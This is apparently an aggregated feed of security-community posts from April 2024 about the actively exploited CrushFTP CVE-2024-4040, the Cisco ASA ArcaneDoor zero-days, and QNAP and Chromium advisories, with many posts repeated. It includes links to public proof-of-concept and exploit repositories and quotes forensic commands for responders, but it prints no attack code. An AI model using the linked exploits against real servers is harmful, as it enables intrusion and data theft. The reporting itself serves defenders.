Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T06:31:26
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-28T03:30:22
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-26T15:32:22.523000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:32:22.523000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:30:34
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-04-26T15:25:47.270000
54 posts
7 repos
https://github.com/Mufti22/CVE-2024-4040
https://github.com/Mohammaddvd/CVE-2024-4040
https://github.com/rbih-boulanouar/CVE-2024-4040
https://github.com/tucommenceapousser/CVE-2024-4040-Scanner
https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC
Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day https://www.securityweek.com/over-1400-crushftp-instances-vulnerable-to-exploited-zero-day/ #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay
##Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day https://www.securityweek.com/over-1400-crushftp-instances-vulnerable-to-exploited-zero-day/ #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation #CISA #KnownExploitedVulnerabilitiesCatalog
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.
Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.
Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation #CISA #KnownExploitedVulnerabilitiesCatalog
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.
Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.
Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).
#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation
##Okay, other than the vendor's email to their customers I have not seen any proof that the #crushFTP bug is unauthenticated.
Can anyone from IR teams confirm that the exploitation was ever unauthenticated? I just need proof if I am to update the CVSS from 7.7 to like, 8.6
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: https://infosec.exchange/@h4sh/112316550866303546
According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.
#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation
##Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). https://www.cve.org/CVERecord?id=CVE-2024-4040
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day https://www.securityweek.com/over-1400-crushftp-instances-vulnerable-to-exploited-zero-day/ #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay
##Over 1,400 CrushFTP Instances Vulnerable to Exploited Zero-Day https://www.securityweek.com/over-1400-crushftp-instances-vulnerable-to-exploited-zero-day/ #Malware&Threats #Vulnerabilities #CVE20244040 #CrushFTP #ZeroDay
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.
Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.
##I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
https://www.cve.org/CVERecord?id=CVE-2024-4040
If anyone disagrees with our CVSS analysis, please let me know & bring proof
##CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) https://fortiguard.fortinet.com/threat-signal-report/5431
##Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis
##@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb
##Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.
https://www.cve.org/CVERecord?id=CVE-2024-4040
> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
##Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
##Exploit from airbus-cert is out for #crushFTP CVE-2024-4040
Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152
##h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040
##CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) https://www.helpnetsecurity.com/2024/04/23/cve-2024-4040/ #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP
##The CrushFTP zero-day is now CVE-2024-4040
##Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis
##@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb
##Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.
https://www.cve.org/CVERecord?id=CVE-2024-4040
> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.
##Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. https://www.rapid7.com/blog/post/2024/04/23/etr-unauthenticated-crushftp-zero-day-enables-complete-server-compromise/
##Exploit from airbus-cert is out for #crushFTP CVE-2024-4040
Expect more in the wild exploitation in the coming days.. https://infosec.exchange/@wvu/112320211100310152
##h/t @JohnHammond https://github.com/airbus-cert/CVE-2024-4040
##The CrushFTP zero-day is now CVE-2024-4040
##updated 2024-04-26T15:25:02.773000
52 posts
1 repos
The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-clicommand.- Use the
enablecommand to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show versionverify /SHA-512 system:memory/textdebug menu memory 8- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
